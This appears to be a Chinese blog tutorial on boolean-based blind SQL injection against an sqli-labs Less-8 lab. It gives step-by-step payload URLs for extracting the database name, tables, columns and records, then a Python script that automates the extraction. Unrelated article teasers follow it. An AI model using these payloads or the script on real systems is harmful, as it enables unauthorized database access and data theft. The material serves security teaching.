SQL注入之布尔盲注
SQL注入之布尔盲注
- 一、布尔盲注介绍
- 二、布尔盲注的特性
- 三、布尔盲注流程
- 3.1、确定注入点
- 3.2、判断数据库的版本
- 3.3、判断数据库的长度
- 3.4、猜解当前数据库名称(本步骤需要重复)
- 3.5、猜解数据表的数量
- 3.6、猜解第一个数据表名称的长度
- 3.7、猜解第一个数据表名称的字符
- 3.8、猜解数据表中字段的数量
- 3.9、猜解第一个数据表名中字段的长度
- 3.10、猜解第一个数据表中字段的字符
- 3.11、获取字段中的记录
- 四、布尔盲注的脚本
推荐:简单了解SQL注入
一、布尔盲注介绍
盲注就是在SQL注入过程中,找到注入点,执行SQL语句后,查询到的数据或者错误信息不能回显到前端页面,此时,我们需要利用一些方法进行判断或者猜测,这个过程称为盲注。
“基于布尔判断的盲注”指的是利用SQL语句逻辑与(and)操作,判断and两边的条件是否成立,SQL语句带入数据库查询后判断返回内容(通常返回值仅有空和非空两种状态),类似布尔型的true和false的两种状态(true为非空,false为空);类似于无法开口说话的人,只能通过点头和摇头来告诉你答案正确与否。
二、布尔盲注的特性
在页面中,如果正确执行了用户构造的SQL语句,则返回一种页面,如果SQL语句执行错误,则返回另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。
三、布尔盲注流程
3.1、确定注入点
方法一:通过增加
'、"、注释符,如果语句从执行失败到执行成功则说明存在注入点。
-
?id=1
-
?id=1'
-
?id=1''
说明存在注入点,且闭合类型为单引号(若闭合类型是双引号,使用单引号像上面所示进行尝试,3个页面都会显示正确)
方法二:
?id=1 and 1=1
?id=1 and 1=2
如果上面两句页面出现的结果不一样,说明没有闭合方式,是数字型
- 解释:为什么不是数字型(是字符型)注入的时候,上面两句的结果会一样。
- 隐式类型转换:
- ?id=‘1asdf’ ===> ?id=‘1’
- ?id=‘1’ ===> ?id=‘1’
- ?id=‘a’ ===> ?id=‘97’
- ?id=‘12abc’ ===>?id=‘12’
- ?id=‘12ab3bc’ ===> ?id=‘12’
?id='1 and 1=1'===>?id='1'?id='1 and 1=2'===>?id='1'
- 隐式类型转换:
?id=1' and 1=1 #
?id=1' and 1=2 #
如果上面两句页面出现的结果不一样,说明闭合方式是单引号,是字符型
3.2、判断数据库的版本
方法:主要因为5.0版本以下没有
information_schema数据库,无法进行手动注入;由于无法回显数据,利用逻辑与和数据库版本第1位数字字符做判断;
- 会使用到
left函数:返回从字符串开始位置指定数量的字符(包含空格)。
LEFT(string_expression, count)
#string_expression 表示字符串,这个参数可以是数据库表的列名,字符串,也可以是某一函数的返回结果。
#count 是整数, 表示从字符串开始位置到结束,返回的字符数量
例如:
select left('5.5.53',1) --> 5
select left('5.5.53',2) --> 5.
http://47.109.71.232:8080/Less-8/?id=1' and left(version(),1)=5--+
- 页面回显正确,说明数据库版本大于5,可以进行注入。
3.3、判断数据库的长度
方法:由于无法回显数据,先使用
length()判断当前数据库的长度,减小后面猜解数据库名称的工作量;
- 使用到
length函数,判断数据库的长度。
http://47.109.71.232:8080/Less-8/?id=1' and length(database())>10--+
http://47.109.71.232:8080/Less-8/?id=1' and length(database())=8--+
3.4、猜解当前数据库名称(本步骤需要重复)
方法:利用第3步确认的数据库长度,结合
ascii()、substr()函数,一个一个字符猜解,利用二分法;
substr()从一个内容中,按照指定条件,「截取」一个字符串。这个内容可以是数值或字符串。
substr(obj,start,length)
#obj:从哪个内容中截取,可以是数值或字符串。
#start:从哪个字符开始截取(1开始,而不是0开始)
#length:截取几个字符(空格也算一个字符)。
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr(database(),1,1))>110--+
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr(database(),1,1))=115--+
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr(database(),2,1))=101--+
3.5、猜解数据表的数量
方法:
count()函数,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5--+
http://47.109.71.232:8080/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4--+
3.6、猜解第一个数据表名称的长度
方法:
length函数,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6--+
3.7、猜解第一个数据表名称的字符
方法:
ascii函数、substr函数,一个一个字符猜解,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
3.8、猜解数据表中字段的数量
方法:
count()函数,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="emails")=2--+
3.9、猜解第一个数据表名中字段的长度
方法:
length函数,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name="emails" limit 0,1))=2 --+
3.10、猜解第一个数据表中字段的字符
方法:
ascii函数、substr函数,一个一个字符猜解,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="emails" limit 0,1),1,1))=105--+
3.11、获取字段中的记录
方法:
ascii函数、substr函数,一个一个字符猜解,利用二分法;
http://47.109.71.232:8080/Less-8/?id=1' and ascii(substr((select group_concat(id) from emails),1,1))=49--+
四、布尔盲注的脚本
import requests
import stringurl = "http://47.109.71.232:8080/Less-8/?id="
# select = "select database()"
# select = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# select = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'"
select = "select group_concat(username) from users"
result = ""
for i in range(1, 100):for ch in string.ascii_letters + string.digits + ",:}{_":payload = f"1' and substr(({select}),{i},1) = '{ch}'%23"r = requests.get(url = url + payload)if "You are in" in r.text:result += chprint(result)breakif ch == "_":print("[***] 注入完成")exit(0)
相关文章:
SQL注入之布尔盲注
SQL注入之布尔盲注 一、布尔盲注介绍二、布尔盲注的特性三、布尔盲注流程3.1、确定注入点3.2、判断数据库的版本3.3、判断数据库的长度3.4、猜解当前数据库名称(本步骤需要重复)3.5、猜解数据表的数量3.6、猜解第一个数据表名称的长度3.7、猜解第一个数据…...
微服务入门---SpringCloud(一)
微服务入门---SpringCloud(一) 1.认识微服务1.0.学习目标1.1.单体架构1.2.分布式架构1.3.微服务1.4.SpringCloud1.5.总结 2.服务拆分和远程调用2.1.服务拆分原则2.2.服务拆分示例2.2.1.导入Sql语句2.2.2.导入demo工程 2.3.实现远程调用案例2.3.1.案例需求…...
Rust vs Go:常用语法对比(九)
题图来自 Golang vs Rust - The Race to Better and Ultimate Programming Language 161. Multiply all the elements of a list Multiply all the elements of the list elements by a constant c 将list中的每个元素都乘以一个数 package mainimport ( "fmt")func …...
Typescript 第五章 类和接口(多态,混入,装饰器,模拟final,设计模式)
第五章 类和接口 类是组织和规划代码的方式,是封装的基本单位。 typescript类大量借用了C#的相关理论,支持可见性修饰符,属性初始化语句,多态,装饰器和接口。 不过,由于Typescript将类编译成常规的JavaScri…...
IFNULL()COALESCE()
在 MySQL 中,IFNULL() 函数是可用的,但是请注意它不能直接用于聚合函数的结果。要在聚合函数结果可能为 NULL 的情况下返回特定值,应该使用 COALESCE() 函数而不是 IFNULL() 函数。 以下是代码示例: COALESCE(SUM(pc.CONTRACT_T…...
WPF实战学习笔记23-首页添加功能
首页添加功能 实现ITodoService、IMemoService接口,并在构造函数中初始化。新建ObservableCollection<ToDoDto>、 ObservableCollection<MemoDto>类型的属性,并将其绑定到UI中修改Addtodo、Addmemo函数,将添加功能添加 添加添加…...
OpenCV-Python常用函数汇总
OpenCV Python OpenCV简述显示窗口waitKey():等待按键输入namedWindow():创建窗口destroyWindow() :注销指定窗口destroyAllWindows() 注销全部窗口resizeWindow() 调整窗口尺寸 图像操作imread():读取图像imwrite():保…...
Vue-router多级路由
目录 直接通过案例的形式来演示多级路由的用法 文件结构 Banner.vue <template><div class"col-xs-offset-2 col-xs-8"><div class"page-header"><h2>Vue Router Demo</h2></div></div> </template><…...
前端学习--vue2--2--vue指令基础
写在前面: 前置内容 - vue配置 文章目录 插值表达式v-html条件渲染v-show和v-ifv-ifv-if的扩展标签复用组件 v-show v-on /事件v-bind /:属性v-modelv-for 循环元素v-slotv-prev-cloak vue指令只的是带有v-前缀的特殊标签属性 插值表达式 插值表达式{…...
【Python机器学习】实验03 logstic回归
文章目录 简单分类模型 - 逻辑回归1.1 准备数据1.2 定义假设函数Sigmoid 函数 1.3 定义代价函数1.4 定义梯度下降算法gradient descent(梯度下降) 1.5 绘制决策边界1.6 计算准确率1.7 试试用Sklearn来解决2.1 准备数据(试试第二个例子)2.2 假设函数与前h相同2.3 代价函数与前相…...
面试-杨辉三角python递归实现,二进制转换
杨辉三角 def yang_hui(x,y):xint(x)yint(y)assert x>y,列数不应该大于行数# x 表示行,y表示列if y1 or yx:return 1else:return yang_hui(x-1,y-1)yang_hui(x-1,y)xinput(输入第几行) yinput(输入第几列) resultyang_hui(int(x),int(y)) print(result) #inclu…...
SPEC CPU 2017 x86_64 Ubuntu 22.04 LTS LLVM 16.0.6 编译 intrate intspeed
源码编译llvm 下载源码 yeqiangyeqiang-MS-7B23:~/Downloads/src$ git clone --depth1 -b 7cbf1a2 https://github.com/llvm/llvm-project 正克隆到 llvm-project... warning: 不能发现要克隆的远程分支 7cbf1a2。 fatal: 远程分支 7cbf1a2 在上游 origin 未发现 yeqiangyeqi…...
java备忘录模式
在Java中,备忘录模式(Memento Design Pattern)用于捕获一个对象的内部状态并在该对象之外保存这个状态。备忘录模式允许在后续需要时将对象恢复到之前保存的状态,而不会暴露其内部结构。 备忘录模式包含以下主要角色:…...
iOS--runtime
什么是Runtime runtime是由C和C、汇编实现的一套API,为OC语言加入了面向对象、运行时的功能运行时(runtime)将数据类型的确定由编译时推迟到了运行时平时编写的OC代码,在程序运行过程中,最终会转换成runtime的C语言代…...
06. 管理Docker容器数据
目录 1、前言 2、Docker实现数据管理的方式 2.1、数据卷(Data Volumes) 2.2、数据卷容器(Data Volume Containers) 3、简单示例 3.1、数据卷示例 3.2、数据卷容器示例 1、前言 在生产环境中使用 Docker,一方面…...
计算机视觉常用数据集介绍
1 MINIST MINIST 数据集应该算是CV里面最早流行的数据了,相当于CV领域的Hello World。该数据包含70000张手写数字图像,其中60000张用于train, 10000张用于test, 并且都有相应的label。图像的尺寸比较小, 为28x28。 数…...
Arcgis画等高线
目录 数据准备绘制等高线3D等高线今天我们将学习如何在ArcGIS中绘制等高线地图。等高线地图是地理信息系统中常见的数据表现形式,它通过等高线将地形起伏展现得一目了然,不仅美观,还能提供重要的地形信息。 数据准备 在开始之前,确保已经准备好了高程数据,它通常以栅格数…...
abp vnext4.3版本托管到iis同时支持http和https协议
在项目上本来一直使用的是http协议,后来因为安全和一些其他原因需要上https协议,如果发布项目之后想同时兼容http和https协议需要更改一下配置信息,下面一起看一下: 1.安装服务器证书 首先你需要先申请一张服务器证书,申请后将证…...
2023年全网电视盒子无线ADB修改桌面(无需ROOT)
前言 1.主要是为了解决电视盒子等安卓设备无法卸载或者停用原始桌面导致无法选用第三方桌面。 解决方案 1.首先自行下载我提供的网盘APK 2.点击打开中国移动云盘 3.不管你是通过U盘还是局域网共享能够让你的电视安装第三方应用,毕竟每个品牌的安装方法不尽相同…...
什么是Java中的Maven?
Java中的Maven,可以简单理解为“一个神奇的工具”,它可以自动帮你管理Java项目的依赖关系,让你不再为手动下载、配置各种库而烦恼。想象一下,你正在写一个Java项目,突然发现需要引入一个名为"第三方库"的模块…...
【C++】总结7
文章目录 函数指针C中类成员的访问权限和继承权限问题定义和声明的区别C中类的静态成员与普通成员的区别是什么?虚函数为什么不能重载为内联函数?对ifdef endif的理解如何在不使用额外空间的情况下,交换两个数? 函数指针 什么是函…...
【前端知识】React 基础巩固(四十二)——React Hooks的介绍
React 基础巩固(四十二)——React Hooks的介绍 一、为什么需要Hook? Hook 是 React 16.8 的新增特性,它可以让我们在不编写class的情况下使用state以及其他的React特性(比如生命周期)。 class组件 VS 函数式组件: class的优势…...
adb命令丨adb push命令大全_adb操控手机和指令
【ADB命令】adb push命令总结 adb push命令大全操控手机和指令 运行在 Android 设备上的adb后台进程 执行 adb shell ps | grep adbd ,可以找到该后台进程,windows 请使用 findstr 替代 grep [xuxu:~]$ adb shell ps | grep adbd root 23227 1 6672 8…...
【腾讯云 Cloud Studio 实战训练营】沉浸式体验编写一个博客系统
文章目录 前言项目中技术栈新建工作空间登录(注册)Cloud Studio 账号:进入 Cloud Studio 控制台:配置工作空间参数:确认并创建工作空间:项目搭建 配置nuxt 脚手架运行项目报错信息解决错误脚手架运行预览问题 开启博客代码配置lay…...
手机视频聊天分享
在人际互动的手机APP中,增加语音视频聊天功能是一个常见的需求。而现在,更进一步,在某些场景下,我们需要能将自己的手机屏幕分享给他人,或者是观看他人的手机屏幕。那么,这些常见的功能是如何实现的了&…...
神经网络小记-优化器
优化器是深度学习中用于优化神经网络模型的一类算法,其主要作用是根据模型的损失函数来调整模型的参数,使得模型能够更好地拟合训练数据,提高模型的性能和泛化能力。优化器在训练过程中通过不断更新模型的参数,使模型逐步接近最优…...
200+行代码写一个简易的Qt界面贪吃蛇
照例先演示一下: 一个简单的Qt贪吃蛇,所有的图片都是我自己画的(得意)。 大致的运行逻辑和之前那个200行写一个C小黑窗贪吃蛇差不多,因此在写这个项目的时候,大多情况是在想怎么通过Qt给展现出来。 背景图…...
redis中使用bloomfilter的白名单功能解决缓存穿透问题
一 缓存预热 1.1 缓存预热 将需要的数据提前缓存到缓存redis中,可以在服务启动时候,或者在使用前一天完成数据的同步等操作。保证后续能够正常使用。 1.2 缓存穿透 在redis中,查询redis缓存数据没有内容,接着查询mysql数据库&…...
Spring Boot 2.7.8以后mysql-connector-java与mysql-connector-j
错误信息 如果升级到Spring Boot 2.7.8,可以看到因为找不到mysql-connector-java依赖而出现错误。 配置: <parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId>&l…...
03|「如何写好一个 Prompt」
前言 Prompt 文章目录 前言一、通用模板和范式1. 组成2. 要求1)文字描述2)注意标点符号 一、通用模板和范式 1. 组成 指令(角色) 生成主体 额外要求 指令:模型具体完成的任务描述。例如,翻译一段文字&…...
网站建设博采/小辉seo
注意如下几点:1 其中,21000是impala-shell使用,21050是impala jdbc使用2 在Impala 2.0以后,可以使用两种方式去连接impala, Cloudera JDBC Connector 和 Hive 0.13 JDBC driver,一般推荐使用的是Cloudera J…...
只想怎样建设自己的销售网站/厦门小鱼网
被人们接受的理论通常不太正确地称为“正确的理论”,其实它只是到目前为止没被事实推翻过而已,并不等于它以后永远不会被推翻 经济学是基于一个假设,一个公理。 假设是“人是自私的” 一个公理——后面我们也会说到,那公理是“…...
创建网站公司 徐州/怎么样推广自己的公司
问题:向正在编辑的Word文档中插入图片时,会发现图片只显示了部分,其余部分被其上面的问题遮挡住 原因:可能是由于设置固定的行间距,导致图片被遮挡 解决方法: 选定插入的图片,在菜单栏中找到 “…...
电子商务网站的类型/app拉新
前言 为防止背题,大部分题目不设标准答案,重点考察面试者的基础知识和思维逻辑,答案的提示见后面。 正文 题目1、举例两个遇到过印象深刻的外网Crash,并介绍如何发现、定位、解决; 题目2、举例两个性能问题的优化&…...
个人网站隐藏服务器真实ip/网络营销的基本功能
一个名为“永恒之石”的最新恶意程序火爆网络圈!它不仅会攻击ShadowBrokers黑客集团从美国国安局(NSA)外流并被恶名昭彰的WannaCry(想哭)勒索蠕虫所利用的EternalBlue和DoublePulsar两个漏洞。厉害的是他还会攻击其他五个由同一黑客集团所外流的漏洞:EternalChampio…...
wordpress首页url/网络营销的方式包括
WindowProc的原型LRESULT CALLBACK WindowProc (HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam); 在VC里面则是:WindowProc(UINT message, WPARAM wParam, LPARAM lParam)一般使用方法如下:先定义一个自定义消息如:1)#define …...